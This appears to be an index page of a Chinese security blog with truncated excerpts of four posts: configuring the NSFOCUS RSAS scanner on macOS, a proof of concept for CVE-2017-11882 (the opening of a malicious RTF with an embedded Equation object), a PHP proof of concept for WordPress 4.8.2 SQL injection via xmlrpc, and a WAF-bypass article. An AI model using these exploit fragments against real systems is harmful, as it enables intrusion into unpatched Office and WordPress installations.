绿盟RSAS 扫描器 MacOS配置小记

Write by webmaster in at 2018-07-09 20:36:57

因工作需要用到绿盟的RSAS扫描器…MacOS与Windows的配置不同,折腾了小半天才搞好…记录下.

1.首先虚拟机打开RSAS扫描器,插入USBKey进入扫描器主机。然后输入用户名或密码登录,打开后然后配置web端访问IP。设置主网卡的为NAT模式,添加一个自定义IP地址(不需要填写网关)。

2.其余六块网卡为扫描网卡,扫描口网卡全部设置选择桥接到宿主机网络,同时跨网段设置其为默认网关。

3.重启RSAS扫描器,在工具中测试是否可用Ping通外网IP,如可用即表示网络配置成功,如未能Ping通请检查主网卡IP是否与扫描器设置的w…

(more…)

CVE-2017-11882 POC

Write by webmaster in at 2018-06-27 10:35:38

CVE-2017-11882 POC
{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Calibri;}}
{\*\generator Riched20 6.3.9600}\viewkind4\uc1
\pard\sa200\sl276\slmult1\f0\fs22\lang9{\object\objemb\objupdate{\*\objclass Equation.3}\objw380\objh260{\*\objdata 01050000020000000b00000…(more…)

WordPress(4.8.2及以下版本) SQL注入漏洞利用

Write by webmaster in at 2018-06-27 10:34:01

POC
$usr = ‘author’;
$pwd = ‘author’;
$xmlrpc = ‘http://local.target/xmlrpc.php’;
$client = new IXR_Client($xmlrpc);
$content = array(“ID” => 6, ‘meta_input’ => array(“_thumbnail_id”=>”xxx”));
$res = $client->query(‘wp.editPost’,0, $usr, $pwd, 6/post_id/, $content);
添加自定义字段,meta_k…(more…)

浅谈绕过WAF的数种方法

Write by webmaster in at 2018-06-16 10:46:38

EMail: rayh4c#80sec.com
Site: http://www.80sec.com
Date: 2011-09-06
From: http://www.80sec.com/?p=244

0×00 前言

08年初诞生了一种SQL群注攻击,黑客在全球范围内对asp,asp.net加MSSQL架构的网站进行了疯狂扫荡。由于MSSQL支持多语句注入,黑客通过一条结合游标的SQL语句就能将整个数据库的字段内容自动进行篡改,可以在网站上无差别的进行网页木马攻击。

互联网是快速更新迭代的,但是很多没有开发能力的单位都是通过外包建立网站,网站的程序一上线就再也无人维护…(more…)